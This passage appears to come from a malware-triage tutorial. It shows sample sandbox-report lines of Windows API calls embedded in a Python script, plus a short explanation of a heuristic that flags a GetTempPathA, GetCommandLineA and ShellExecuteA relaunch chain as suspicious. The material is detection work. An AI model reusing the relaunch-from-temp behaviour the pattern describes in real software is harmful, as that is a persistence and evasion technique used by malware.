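  • Part of subcall function 0040E468: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,Function_00004ADA), ref: 0040E4A1
• SetCurrentDirectoryA.KERNEL32(00000000), ref: 00411368
  • Part of subcall function 0040EAA0: GetTempPathA.KERNEL32(00000105,?,00000000,Function_00005072), ref: 0040EACE
  • Part of subcall function 0040E468: GetCommandLineA.KERNEL32(00000000,Function_00004ADA), ref: 0040E4BB
• ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00411401
"""

if __name__ == "__main__":
    for name, why in classify(parse_api_lines(SAMPLE_REPORT_LINES)).items():
        print(f"{name}: {why}")
```

Run against the embedded lines it reports the Delphi registry read as benign and the relaunch chain as suspicious with the ShellExecuteA call site 0x00411401; drop the GetTempPathA bullet and the second finding disappears, which is the point of requiring all three APIs rather than keying on ShellExecuteA alone.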